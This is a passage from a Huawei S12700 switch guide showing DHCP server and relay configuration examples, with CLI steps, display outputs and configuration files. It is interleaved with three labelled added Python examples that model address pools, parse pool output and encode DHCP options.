[Switch-Vlanif11] quit

Step 5 Configure each terminal (using the PC running Windows 7 as an example) to automatically
obtain an IP address.
1. Right-click Network and choose Properties to display the Network and Sharing
Center window.
2. Click Local Area Connection to display the Local Area Connection Status window.
3. Click Properties to display the Local Area Connection Properties window.
4. Select Internet Protocol Version 4 (TCP/IPv4) and click Properties to display the
Internet Protocol Version 4 (TCP/IPv4) Properties window. Select Obtain an IP
address automatically, and click OK.
Step 6 Verify the configuration.
Run the display ip pool command on the Switch to check the configuration of VLANIF 10
and VLANIF 11. For example, the enterprise has 100 employees with fixed office terminals
and 3 employees on business trips.
[Switch] display ip pool interface vlanif10
Pool-name : Vlanif10
Pool-No : 0
Lease : 30 Days 0 Hours 0 Minutes
Domain-name : -
DNS-server0 : -
NBNS-server0 : -
Netbios-type : -
Position : Interface Status : Unlocked
Gateway-0 : 10.1.1.1
Network : 10.1.1.0
Mask : 255.255.255.0
VPN instance : --

-----------------------------------------------------------------------------
Start End Total Used Idle(Expired) Conflict Disable
-----------------------------------------------------------------------------
10.1.1.1 10.1.1.254 253 100 153(0) 0 0
-----------------------------------------------------------------------------
[Switch] display ip pool interface vlanif11
Pool-name : Vlanif11
Pool-No : 1
Lease : 1 Days 0 Hours 0 Minutes
Domain-name : -
DNS-server0 : -
NBNS-server0 : -
Netbios-type : -
Position : Interface Status : Unlocked
Gateway-0 : 10.1.2.1
Network : 10.1.2.0
Mask : 255.255.255.0
VPN instance : --

-----------------------------------------------------------------------------
Start End Total Used Idle(Expired) Conflict Disable
-----------------------------------------------------------------------------
10.1.2.1 10.1.2.254 253 3 250(0) 0 0
-----------------------------------------------------------------------------
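An added example, not part of the Huawei document, modelling what the interface address pool configured in Step 4 does: the pool consists of the VLANIF subnet's host addresses minus the interface address itself (the clients' gateway), a static binding reserves one address for one MAC address, and the lease is a per-pool setting that a renewing client keeps together with its address. Client_1's MAC and fixed address are taken from this example; the MAC addresses of the other 99 fixed-office terminals and of the three travelling employees are constructed. Run as written, the counters match the display ip pool output above: Total 253, Used 100 and Idle 153 on VLANIF 10, Used 3 and Idle 250 on VLANIF 11.

```python
import ipaddress
from datetime import timedelta


class InterfacePool:
    """Interface address pool: the VLANIF subnet's host addresses minus the
    interface address (the gateway), with static MAC bindings and one lease
    for the whole pool. Model written for this example, not switch code."""

    def __init__(self, interface_ip, lease=timedelta(days=1)):
        iface = ipaddress.ip_interface(interface_ip)
        self.network = iface.network
        self.gateway = iface.ip
        self.lease = lease                    # default one day, as on the switch
        self.static = {}                      # mac -> address reserved for it
        self.leases = {}                      # mac -> address currently held
        self.free = [h for h in self.network.hosts() if h != self.gateway]

    def static_bind(self, ip, mac):
        """dhcp server static-bind ip-address <ip> mac-address <mac>"""
        ip = ipaddress.ip_address(ip)
        if ip not in self.free:
            raise ValueError(f"{ip} is not a free allocatable address in {self.network}")
        self.free.remove(ip)                  # never handed to any other MAC
        self.static[mac] = ip

    def allocate(self, mac):
        """Return (address, lease) for a client, or (None, None) when exhausted."""
        if mac in self.leases:
            return self.leases[mac], self.lease   # renewal keeps the address
        if mac in self.static:
            ip = self.static[mac]
        elif self.free:
            ip = self.free.pop(0)
        else:
            return None, None
        self.leases[mac] = ip
        return ip, self.lease

    def summary(self):
        """Counters in the shape of 'display ip pool interface ...'."""
        hosts = list(self.network.hosts())
        total = len(hosts) - 1                # the gateway address is not allocatable
        used = len(self.leases)
        return {"start": hosts[0], "end": hosts[-1], "total": total,
                "used": used, "idle": total - used}


CLIENT1_MAC = "286e-d488-b684"                # DHCP Client_1 in this example


def simulate_office():
    """Constructed run: 100 fixed-office terminals on VLANIF 10 (30-day lease)
    and 3 travelling employees on VLANIF 11 (default one-day lease)."""
    pool10 = InterfacePool("10.1.1.1/24", lease=timedelta(days=30))
    pool10.static_bind("10.1.1.100", CLIENT1_MAC)
    pool11 = InterfacePool("10.1.2.1/24")
    # Constructed MAC addresses for the remaining 99 fixed terminals.
    for mac in [CLIENT1_MAC] + [f"0200-0000-{i:04x}" for i in range(1, 100)]:
        pool10.allocate(mac)
    for i in range(1, 4):                     # constructed MACs for three visitors
        pool11.allocate(f"0200-0000-1{i:03x}")
    return pool10, pool11


if __name__ == "__main__":
    for pool in simulate_office():
        print(pool.network, pool.summary())
```

The static binding is removed from the free list at configuration time, not at first lease, so the reserved address can never be handed to a different client even if Client_1 has not booted yet; that is the property an operator relies on when a fixed address is required for a service.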

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 to 11
#
dhcp enable
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
dhcp select interface
dhcp server static-bind ip-address 10.1.1.100 mac-address 286e-d488-b684
dhcp server lease day 30 hour 0 minute 0
#
interface Vlanif11
ip address 10.1.2.1 255.255.255.0
dhcp select interface
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 11
#
return

Relevant Information
Video
Configure DHCP Server and Relay

8.1.2 Example for Configuring a Device as the DHCP Server (Based on the Global Address Pool)

DHCP Server Overview
Users require that all terminals on a network dynamically obtain network parameters such as
IP addresses, the DNS server IP address, routing information, and gateway information, so that
the network parameters, including terminal IP addresses, do not need to be configured manually.
In addition, mobile terminals (for example, mobile phones, tablets, and laptops) should support
plug-and-play, without the network parameters being modified each time they connect. To meet
these requirements, the DHCP server function can be configured on an aggregation-layer user
gateway or a core-layer device to assign network parameters such as IP addresses to
terminals.
The Dynamic Host Configuration Protocol (DHCP) uses the client/server model to
dynamically configure and uniformly manage network parameters for users. The DHCP
server assigns network parameters such as IP addresses from an address pool, which can be
either a global address pool or an interface address pool.
An interface address pool is simple to configure, but it can be used only when the users and
the DHCP server belong to the same network segment, and the server can assign network
parameters only to the users on that interface. It is applicable to small networks with a
limited number of devices and a manageable configuration and maintenance workload. After
the DHCP server function based on the interface address pool is configured on the user
gateway, the hosts and mobile terminals on the interface obtain network parameters such as
IP addresses automatically, without manual configuration or modification.
Compared with an interface address pool, a global address pool can be applied to large
networks. The DHCP server function based on the global address pool should be configured
on a core device, or a dedicated DHCP server should be used to assign network parameters
such as IP addresses; the user gateway then only needs the DHCP relay function enabled. For
details, see 8.1.4 Example for Configuring the Device as a DHCP Relay (on the Same
Network).

Configuration Notes
This example applies to all versions of the S12700 switches.

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 8-2, an enterprise has two offices. To save network resources, the switch
functions as the DHCP server to allocate IP addresses to hosts in both offices. Hosts in
office 1 are on the network segment 10.1.1.0/25 and are added to VLAN 10; the lease of their
IP addresses is ten days. Hosts in office 2 are on the network segment 10.1.1.128/25 and are
added to VLAN 11; the lease of their IP addresses is two days.

Figure 8-2 Networking diagram for configuring a device as the DHCP server
(Figure not reproduced. The Switch, acting as the DHCP server, connects to the IP network, on
which the DNS server 10.1.2.3/25 resides. GE1/0/1 belongs to VLANIF10 (10.1.1.1/25) and
serves DHCP Client_1 ... DHCP Client_n; GE1/0/2 belongs to VLANIF11 (10.1.1.129/25) and
serves DHCP Client_s ... DHCP Client_t.)

Configuration Roadmap
The configuration roadmap is as follows:
Configure the switch as the DHCP server to dynamically allocate IP addresses and the DNS
server address to hosts in the two offices. PCs on the network segment 10.1.1.0/25 are for
employees in office 1 and obtain IP addresses with a lease of ten days. PCs on the network
segment 10.1.1.128/25 are for employees in office 2 and obtain IP addresses with a lease of
two days.

Procedure
Step 1 Enable the DHCP service.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] dhcp enable

Step 2 Add interfaces to VLANs.

# Add GE1/0/1 to VLAN 10.
[Switch] vlan batch 10 to 11
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type hybrid
[Switch-GigabitEthernet1/0/1] port hybrid pvid vlan 10
[Switch-GigabitEthernet1/0/1] port hybrid untagged vlan 10
[Switch-GigabitEthernet1/0/1] quit

# Add GE1/0/2 to VLAN 11.
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type hybrid
[Switch-GigabitEthernet1/0/2] port hybrid pvid vlan 11
[Switch-GigabitEthernet1/0/2] port hybrid untagged vlan 11
[Switch-GigabitEthernet1/0/2] quit

Step 3 Configure IP addresses for VLANIF interfaces.

# Configure an IP address for VLANIF 10.
[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 10.1.1.1 25
[Switch-Vlanif10] quit

# Configure an IP address for VLANIF 11.
[Switch] interface vlanif 11
[Switch-Vlanif11] ip address 10.1.1.129 25
[Switch-Vlanif11] quit

Step 4 Configure global address pools.

# Configure the IP addresses and relevant network parameters of the global address pool
pool1.
[Switch] ip pool pool1
[Switch-ip-pool-pool1] network 10.1.1.0 mask 255.255.255.128
[Switch-ip-pool-pool1] dns-list 10.1.2.3
[Switch-ip-pool-pool1] gateway-list 10.1.1.1
[Switch-ip-pool-pool1] lease day 10
[Switch-ip-pool-pool1] quit

# Configure the IP addresses and relevant network parameters of the global address pool
pool2.
[Switch] ip pool pool2
[Switch-ip-pool-pool2] network 10.1.1.128 mask 255.255.255.128
[Switch-ip-pool-pool2] dns-list 10.1.2.3
[Switch-ip-pool-pool2] gateway-list 10.1.1.129
[Switch-ip-pool-pool2] lease day 2
[Switch-ip-pool-pool2] quit

Step 5 Enable the DHCP server.

# Enable the DHCP server on VLANIF 10.
[Switch] interface vlanif 10
[Switch-Vlanif10] dhcp select global
[Switch-Vlanif10] quit

# Enable the DHCP server on VLANIF 11.
[Switch] interface vlanif 11
[Switch-Vlanif11] dhcp select global
[Switch-Vlanif11] quit

Step 6 Verify the configuration.

# Run the display ip pool name pool1 command on the switch to view IP address allocation
in the global address pool pool1. The Used field displays the number of allocated IP
addresses.
[Switch] display ip pool name pool1
Pool-name : pool1
Pool-No : 0
Lease : 10 Days 0 Hours 0 Minutes
Domain-name : -
DNS-server0 : 10.1.2.3
NBNS-server0 : -
Netbios-type : -
Position : Local Status : Unlocked
Gateway-0 : 10.1.1.1
Network : 10.1.1.0
Mask : 255.255.255.128
VPN instance : --

-----------------------------------------------------------------------------
Start End Total Used Idle(Expired) Conflict Disable
-----------------------------------------------------------------------------
10.1.1.1 10.1.1.126 125 2 123(0) 0 0
-----------------------------------------------------------------------------

# Run the display ip pool name pool2 command on the switch to view IP address allocation
in the global address pool pool2. The Used field displays the number of allocated IP
addresses.
[Switch] display ip pool name pool2
Pool-name : pool2
Pool-No : 1
Lease : 2 Days 0 Hours 0 Minutes
Domain-name : -
DNS-server0 : 10.1.2.3
NBNS-server0 : -
Netbios-type : -
Position : Local Status : Unlocked
Gateway-0 : 10.1.1.129
Network : 10.1.1.128
Mask : 255.255.255.128
VPN instance : --

-----------------------------------------------------------------------------
Start End Total Used Idle(Expired) Conflict Disable
-----------------------------------------------------------------------------
10.1.1.129 10.1.1.254 125 2 123(0) 0 0
-----------------------------------------------------------------------------
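An added example, not from the Huawei document: a parser for the display ip pool output shown in Step 6 (the pool1 output above is embedded as the constructed sample), followed by the consistency checks an operator would script after reading it. Total must equal the host addresses of Network/Mask minus the gateway(s), the Used, Idle, Conflict and Disable columns must add up to Total, the gateway and the Start/End addresses must lie inside the network, and the lease must be the value that was configured. The field names in the returned dictionary are the ones the switch prints.

```python
import ipaddress
import re
from datetime import timedelta

# Constructed sample: the "display ip pool name pool1" output from this example.
POOL_OUTPUT = """\
Pool-name : pool1
Pool-No : 0
Lease : 10 Days 0 Hours 0 Minutes
Domain-name : -
DNS-server0 : 10.1.2.3
NBNS-server0 : -
Netbios-type : -
Position : Local Status : Unlocked
Gateway-0 : 10.1.1.1
Network : 10.1.1.0
Mask : 255.255.255.128
VPN instance : --

-----------------------------------------------------------------------------
Start End Total Used Idle(Expired) Conflict Disable
-----------------------------------------------------------------------------
10.1.1.1 10.1.1.126 125 2 123(0) 0 0
-----------------------------------------------------------------------------
"""

KV_RE = re.compile(r"^([A-Za-z][A-Za-z0-9 _-]*?)\s*:\s*(.*)$")
LEASE_RE = re.compile(r"(\d+) Days (\d+) Hours (\d+) Minutes")
STATS_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\d+)\s+(\d+)\s+(\d+)\((\d+)\)\s+(\d+)\s+(\d+)$")


def parse_ip_pool(text):
    """Return the key/value header as a dict plus a 'stats' dict for the counter row."""
    pool = {}
    for raw in text.splitlines():
        line = raw.strip()
        m = STATS_RE.match(line)
        if m:
            start, end, total, used, idle, expired, conflict, disable = m.groups()
            pool["stats"] = {
                "start": ipaddress.ip_address(start), "end": ipaddress.ip_address(end),
                "total": int(total), "used": int(used), "idle": int(idle),
                "expired": int(expired), "conflict": int(conflict), "disable": int(disable)}
            continue
        m = KV_RE.match(line)
        if not m:
            continue                          # rulers, column headers, blank lines
        key, value = m.groups()
        if key == "Position":                 # "Position : Local Status : Unlocked" holds two fields
            position, status = value.split(" Status :")
            pool["Position"], pool["Status"] = position.strip(), status.strip()
        elif key == "Lease":
            if value == "unlimited":
                pool["Lease"] = None
            else:
                d, h, mi = (int(x) for x in LEASE_RE.match(value).groups())
                pool["Lease"] = timedelta(days=d, hours=h, minutes=mi)
        else:
            pool[key] = None if value in ("-", "--") else value
    return pool


def check_pool(pool, expected_lease_days=None):
    """Sanity checks on a parsed pool; returns a list of problem strings (empty = OK)."""
    problems = []
    s = pool["stats"]
    network = ipaddress.ip_network(f"{pool['Network']}/{pool['Mask']}")
    gateways = [ipaddress.ip_address(v) for k, v in pool.items()
                if k.startswith("Gateway-") and v]
    # Usable addresses: all hosts (network and broadcast excluded) minus the gateway(s).
    expected_total = network.num_addresses - 2 - len(gateways)
    if s["total"] != expected_total:
        problems.append(f"Total {s['total']} != {expected_total} derived from {network}")
    if s["used"] + s["idle"] + s["conflict"] + s["disable"] != s["total"]:
        problems.append("Used + Idle + Conflict + Disable != Total")
    for gw in gateways:
        if gw not in network:
            problems.append(f"gateway {gw} outside {network}")
    if s["start"] not in network or s["end"] not in network:
        problems.append("Start/End outside Network")
    if expected_lease_days is not None and pool["Lease"] != timedelta(days=expected_lease_days):
        problems.append(f"Lease {pool['Lease']} != {expected_lease_days} days")
    return problems


if __name__ == "__main__":
    parsed = parse_ip_pool(POOL_OUTPUT)
    print(parsed["Pool-name"], parsed["stats"], check_pool(parsed, expected_lease_days=10))
```

The lease check is the one most worth automating: a pool whose lease silently reverted to the one-day default, or one whose Conflict column is non-zero, is usually the first sign that a second DHCP server or a statically addressed host is present on the segment.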

----End

Configuration Files
Switch configuration file
#
sysname Switch
#
vlan batch 10 to 11
#
dhcp enable
#
ip pool pool1
gateway-list 10.1.1.1
network 10.1.1.0 mask 255.255.255.128
lease day 10 hour 0 minute 0
dns-list 10.1.2.3
#
ip pool pool2
gateway-list 10.1.1.129
network 10.1.1.128 mask 255.255.255.128
lease day 2 hour 0 minute 0
dns-list 10.1.2.3
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.128
dhcp select global
#
interface Vlanif11
ip address 10.1.1.129 255.255.255.128
dhcp select global
#
interface GigabitEthernet1/0/1
port hybrid pvid vlan 10
port hybrid untagged vlan 10
#
interface GigabitEthernet1/0/2
port hybrid pvid vlan 11
port hybrid untagged vlan 11
#
return

Relevant Information
Video
Configure DHCP Server and Relay

8.1.3 Example for Configuring a DHCP Server to Allocate Different Network Parameters from the Global Address Pool to Dynamic and Static Clients

DHCP Server Overview
Users require that all terminals on a network dynamically obtain network parameters such as
IP addresses, the DNS server IP address, routing information, and gateway information, so that
the network parameters, including terminal IP addresses, do not need to be configured manually.
In addition, mobile terminals (for example, mobile phones, tablets, and laptops) should support
plug-and-play, without the network parameters being modified each time they connect. To meet
these requirements, the DHCP server function can be configured on an aggregation-layer user
gateway or a core-layer device to assign network parameters such as IP addresses to
terminals.
The Dynamic Host Configuration Protocol (DHCP) uses the client/server model to
dynamically configure and uniformly manage network parameters for users. The DHCP
server assigns network parameters such as IP addresses from an address pool, which can be
either a global address pool or an interface address pool.
An interface address pool is simple to configure, but it can be used only when the users and
the DHCP server belong to the same network segment, and the server can assign network
parameters only to the users on that interface. It is applicable to small networks with a
limited number of devices and a manageable configuration and maintenance workload. After
the DHCP server function based on the interface address pool is configured on the user
gateway, the hosts and mobile terminals on the interface obtain network parameters such as
IP addresses automatically, without manual configuration or modification.
Compared with an interface address pool, a global address pool can be applied to large
networks. The DHCP server function based on the global address pool should be configured
on a core device, or a dedicated DHCP server should be used to assign network parameters
such as IP addresses; the user gateway then only needs the DHCP relay function enabled. For
details, see 8.1.4 Example for Configuring the Device as a DHCP Relay (on the Same
Network).

Configuration Notes
This example applies to all versions of the S12700 switches.
NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 8-3, the IP phone and PCs are devices in an office area. To manage devices
uniformly and reduce manual configuration costs, the administrator needs to configure hosts to
dynamically obtain IP addresses through DHCP. The PCs are fixed terminals in the duty room;
they need to be online at all times and use domain names to access network devices, so in
addition to obtaining IP addresses dynamically, they require an unlimited IP address lease and
the address of the DNS server. The IP phone uses the fixed IP address 10.1.1.4/24 and its MAC
address is dcd2-fc96-e4c0. In addition to obtaining an IP address, the IP phone needs to
dynamically obtain its startup configuration file, configuration.ini, which is stored on the FTP
server; the routes between the FTP server and the IP phone must be reachable. The gateway
address of the PCs and IP phone is 10.1.1.1/24.

Figure 8-3 Networking diagram for configuring a device as the DHCP server
(Figure not reproduced. SwitchA, the DHCP server, connects to the Internet and, through
GE1/0/1 in VLANIF10 (10.1.1.1/24), to SwitchB. Behind SwitchB are the IP phone
(10.1.1.4/24), the PCs, the DNS server (10.1.1.2/24), and the FTP server (10.1.1.3/24).)

Configuration Roadmap
1. Create a DHCP Option template on SwitchA. In the DHCP Option template view,
configure the startup configuration file for the static client IP phone, and specify the IP
address of the FTP server for the IP phone.
2. Create a global address pool on SwitchA. In the global address pool view, configure the
IP address lease and information about the DNS server for the dynamic client PCs. Bind
an IP address and the DHCP Option template to the MAC address of the static client IP
phone. In this way, the DHCP server can allocate different network parameters to
dynamic and static clients.

Procedure
Step 1 Create a VLAN and configure an IP address for the VLANIF interface.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan 10
[SwitchA-vlan10] quit
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type hybrid
[SwitchA-GigabitEthernet1/0/1] port hybrid pvid vlan 10
[SwitchA-GigabitEthernet1/0/1] port hybrid untagged vlan 10
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface vlanif 10
[SwitchA-Vlanif10] ip address 10.1.1.1 255.255.255.0
[SwitchA-Vlanif10] quit

Step 2 Enable the DHCP service.
[SwitchA] dhcp enable

Step 3 Create a DHCP Option template. In the DHCP Option template view, configure the startup
configuration file for the static client IP phone, and specify the IP address of the file server for
the IP phone.
[SwitchA] dhcp option template template1
[SwitchA-dhcp-option-template-template1] gateway-list 10.1.1.1
[SwitchA-dhcp-option-template-template1] bootfile configuration.ini
[SwitchA-dhcp-option-template-template1] next-server 10.1.1.3
[SwitchA-dhcp-option-template-template1] quit

Step 4 Create an IP address pool. In the IP address pool view, configure the gateway address, IP
address lease, and IP address of the DNS server for the PCs. Allocate a fixed IP address to the
IP phone and configure the startup configuration file.
[SwitchA] ip pool pool1
[SwitchA-ip-pool-pool1] network 10.1.1.0 mask 255.255.255.0
[SwitchA-ip-pool-pool1] dns-list 10.1.1.2
[SwitchA-ip-pool-pool1] gateway-list 10.1.1.1
[SwitchA-ip-pool-pool1] excluded-ip-address 10.1.1.2 10.1.1.3
[SwitchA-ip-pool-pool1] lease unlimited
[SwitchA-ip-pool-pool1] static-bind ip-address 10.1.1.4 mac-address dcd2-fc96-e4c0 option-template template1
[SwitchA-ip-pool-pool1] quit

Step 5 Enable the DHCP server function on the VLANIF 10 interface.
[SwitchA] interface vlanif 10
[SwitchA-Vlanif10] dhcp select global
[SwitchA-Vlanif10] quit

Step 6 Verify the configuration.

# Run the display ip pool name pool1 command on SwitchA to view the address pool
configuration.
[SwitchA] display ip pool name pool1
Pool-name : pool1
Pool-No : 0
Lease : unlimited
Domain-name : -
DNS-server0 : 10.1.1.2
NBNS-server0 : -
Netbios-type : -
Position : Local Status : Unlocked
Gateway-0 : 10.1.1.1
Network : 10.1.1.0
Mask : 255.255.255.0
VPN instance : --

-----------------------------------------------------------------------------
Start End Total Used Idle(Expired) Conflict Disable
-----------------------------------------------------------------------------
10.1.1.1 10.1.1.254 253 4 247(0) 0 2
-----------------------------------------------------------------------------

# Run the display dhcp option template name template1 command on SwitchA to view the
DHCP Option template configuration.
[SwitchA] display dhcp option template name template1
-----------------------------------------------------------------------------
Template-Name : template1
Template-No : 0
Next-server : 10.1.1.3
Domain-name : -
DNS-server0 : -
NBNS-server0 : -
Netbios-type : -
Gateway-0 : 10.1.1.1
Bootfile : configuration.ini
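An added example, not the switch's own code, showing what "different network parameters for dynamic and static clients" looks like on the wire. From a constructed model of pool1 and template1 that uses the values configured in Steps 3 and 4, it builds the yiaddr, siaddr and RFC 2132 options the server would return for the IP phone (statically bound to template1) and for one of the PCs. Assumptions made here and not stated in the document: parameters set in the bound option template replace the pool's (so the phone gets the template's gateway and boot file but no DNS option), the lease still comes from the pool, and next-server is carried in the siaddr field. The unlimited lease is encoded as 0xFFFFFFFF, which RFC 2132 defines as infinity for option 51.

```python
import ipaddress
import struct

INFINITE_LEASE = 0xFFFFFFFF     # RFC 2132 section 9.2: lease time "infinity"

# Constructed model of pool1 / template1 from this example. The dict layout is
# this example's own, not the switch's internal representation.
POOL1 = {
    "network": ipaddress.ip_network("10.1.1.0/24"),
    "gateway": ipaddress.ip_address("10.1.1.1"),
    "dns": [ipaddress.ip_address("10.1.1.2")],
    "lease_seconds": None,                             # "lease unlimited"
    "excluded": [(ipaddress.ip_address("10.1.1.2"), ipaddress.ip_address("10.1.1.3"))],
    "static": {"dcd2-fc96-e4c0": (ipaddress.ip_address("10.1.1.4"), "template1")},
}
TEMPLATES = {
    "template1": {
        "gateway": ipaddress.ip_address("10.1.1.1"),
        "next_server": ipaddress.ip_address("10.1.1.3"),   # assumed to fill siaddr
        "bootfile": "configuration.ini",                   # option 67
    },
}


def _opt(code, payload):
    """One RFC 2132 option: code, length, value."""
    return bytes([code, len(payload)]) + payload


def encode_options(router=None, dns=(), lease_seconds=None, bootfile=None):
    """Options field of an OFFER/ACK: 3 = router, 6 = DNS servers,
    51 = lease time, 67 = boot file name, 255 = end."""
    out = b""
    if router is not None:
        out += _opt(3, router.packed)
    if dns:
        out += _opt(6, b"".join(a.packed for a in dns))
    lease = INFINITE_LEASE if lease_seconds is None else lease_seconds
    out += _opt(51, struct.pack("!I", lease))
    if bootfile:
        out += _opt(67, bootfile.encode("ascii"))
    return out + b"\xff"


def decode_options(data):
    """Inverse of encode_options: {code: payload}; stops at the end option."""
    opts, i = {}, 0
    while i < len(data) and data[i] != 0xFF:
        code, length = data[i], data[i + 1]
        opts[code] = data[i + 2:i + 2 + length]
        i += 2 + length
    return opts


def first_dynamic_address(pool):
    """First address that is neither the gateway, excluded, nor statically bound."""
    reserved = {ip for ip, _ in pool["static"].values()} | {pool["gateway"]}
    for host in pool["network"].hosts():
        if host in reserved:
            continue
        if any(lo <= host <= hi for lo, hi in pool["excluded"]):
            continue
        return host
    return None


def build_offer(pool, templates, mac):
    """(yiaddr, siaddr, options) the server would send to this client.
    Assumption of this example: template parameters replace the pool's,
    the lease is always the pool's."""
    binding = pool["static"].get(mac)
    if binding:
        ip, template_name = binding
        t = templates[template_name]
        options = encode_options(router=t["gateway"], lease_seconds=pool["lease_seconds"],
                                 bootfile=t["bootfile"])
        return ip, t["next_server"], options
    options = encode_options(router=pool["gateway"], dns=pool["dns"],
                             lease_seconds=pool["lease_seconds"])
    return first_dynamic_address(pool), ipaddress.ip_address("0.0.0.0"), options


if __name__ == "__main__":
    for mac in ("dcd2-fc96-e4c0", "0200-0000-0001"):        # phone, then a constructed PC MAC
        yiaddr, siaddr, opts = build_offer(POOL1, TEMPLATES, mac)
        print(mac, yiaddr, siaddr, {k: v for k, v in decode_options(opts).items()})
```

Encoding the options explicitly makes the trust boundary visible: the boot file name and next-server address are delivered to the phone unauthenticated inside an OFFER, so the FTP server 10.1.1.3 and the excluded-address list that keeps 10.1.1.2 and 10.1.1.3 out of dynamic assignment are what prevent a dynamically addressed host from being handed those addresses.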

----End

Configuration Files
Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 10
#
dhcp enable
#
dhcp option template template1
gateway-list 10.1.1.1
next-server 10.1.1.3
bootfile configuration.ini
#
ip pool pool1
gateway-list 10.1.1.1
network 10.1.1.0 mask 255.255.255.0
excluded-ip-address 10.1.1.2 10.1.1.3
static-bind ip-address 10.1.1.4 mac-address dcd2-fc96-e4c0 option-template template1
lease unlimited
dns-list 10.1.1.2
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
dhcp select global
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid pvid vlan 10
port hybrid untagged vlan 10
#
return

Relevant Information
Video
Configure DHCP Server and Relay

8.1.4 Example for Configuring the Device as a DHCP Relay (on the Same Network)

DHCP Relay Overview
A DHCP relay forwards DHCP packets between the DHCP server and clients. When the
DHCP server and clients belong to different network segment, the DHCP relay needs to be
configured. For DHCP clients, the DHCP relay is the DHCP server; for the DHCP server, the
DHCP relay is a DHCP client.
The DHCP relay function applies to large networks with many sparsely-distributed user
gateways. To reduce the maintenance workload, the network administrator does not want to

Issue 10 (2016-10-30) Huawei Proprietary and Confidential 475


Copyright © Huawei Technologies Co., Ltd.
S12700 Series Agile Switches
Typical Configuration Examples 8 Typical IP Service Configuration

configure the DHCP server function on each aggregation switch (user gateway) and requires
that the DHCP server function be configured on a core device or an exclusive DHCP server
be deployed in the server area. In this case, the aggregation switches functioning as the user
gateways need to be configured with the DHCP relay function to implement exchange of
DHCP packets between the DHCP server and clients.

Configuration Notes
This example applies to all versions of the S12700 switches.

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 8-4, an enterprise deploys the DHCP server on the core switch. The
DHCP server and terminals in the enterprise belong to different network segments. The
enterprise requires that the DHCP server should dynamically assign IP addresses to the
terminals.

Figure 8-4 Networking diagram for configuring the device as a DHCP relay

[Figure 8-4: SwitchB (DHCP Server) connects to the Internet and, through GE1/0/1 (VLANIF200, 192.168.20.2/24), to SwitchA. SwitchA (DHCP Relay) uses GE1/0/1 (VLANIF200, 192.168.20.1/24) towards SwitchB and GE1/0/2 (VLANIF100, 10.10.20.1/24) towards the LSW, to which the DHCP clients are attached.]


Configuration Roadmap
The configuration roadmap is as follows:
1. Configure the DHCP relay on SwitchA (user gateway) to forward DHCP packets
between the terminals and DHCP server.
2. On SwitchB, configure the DHCP server based on the global address pool so that the
DHCP server can assign IP addresses from the global address pool to the terminals.
NOTE

Use a Huawei S series switch as an example for the DHCP server (SwitchB).
On the LSW, configure the interface link type and VLAN to implement Layer 2 communication.

Procedure
Step 1 Configure the DHCP relay on SwitchA.
# Add the interface to the VLAN.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100 200
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 200
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type access
[SwitchA-GigabitEthernet1/0/2] port default vlan 100
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface vlanif 200
[SwitchA-Vlanif200] ip address 192.168.20.1 24
[SwitchA-Vlanif200] quit

# Enable the DHCP relay function on the interface.


[SwitchA] dhcp enable //Enable the DHCP service. By default, the service is disabled.
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] ip address 10.10.20.1 24
[SwitchA-Vlanif100] dhcp select relay //Enable the DHCP relay function. By default, the function is disabled.
[SwitchA-Vlanif100] dhcp relay server-ip 192.168.20.2 //Configure the DHCP server IP address for the DHCP relay agent.
[SwitchA-Vlanif100] quit

Step 2 Configure the DHCP server function based on the global address pool on SwitchB.
# Enable the DHCP service. By default, the service is disabled.
<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] dhcp enable

# Configure VLANIF 200 to work in global address pool mode.


[SwitchB] vlan 200
[SwitchB-vlan200] quit
[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] port link-type trunk
[SwitchB-GigabitEthernet1/0/1] port trunk allow-pass vlan 200
[SwitchB-GigabitEthernet1/0/1] quit
[SwitchB] interface vlanif 200
[SwitchB-Vlanif200] ip address 192.168.20.2 24
[SwitchB-Vlanif200] dhcp select global //Enable the DHCP server function based on the global address pool on the interface. By default, the function is disabled.
[SwitchB-Vlanif200] quit

# Create an address pool and configure the attributes. The default lease (one day) is used and
does not need to be configured.
[SwitchB] ip pool pool1
[SwitchB-ip-pool-pool1] network 10.10.20.0 mask 24 //Configure the network segment and mask of the global address pool.
[SwitchB-ip-pool-pool1] gateway-list 10.10.20.1 //Configure the gateway address assigned to the terminals.
[SwitchB-ip-pool-pool1] quit

Step 3 Configure static routes to the terminals on SwitchB.


[SwitchB] ip route-static 10.10.20.0 255.255.255.0 192.168.20.1

Step 4 Configure each terminal (using the PC running Windows 7 as an example) to automatically
obtain an IP address.
1. Right-click Network and choose Properties to display the Network and Sharing
Center window.
2. Click Local Area Connection to display the Local Area Connection Status window.
3. Click Properties to display the Local Area Connection Properties window.
4. Select Internet Protocol Version 4 (TCP/IPv4) and click Properties to display the
Internet Protocol Version 4 (TCP/IPv4) Properties window. Select Obtain an IP
address automatically, and click OK.

Step 5 Verify the configuration.

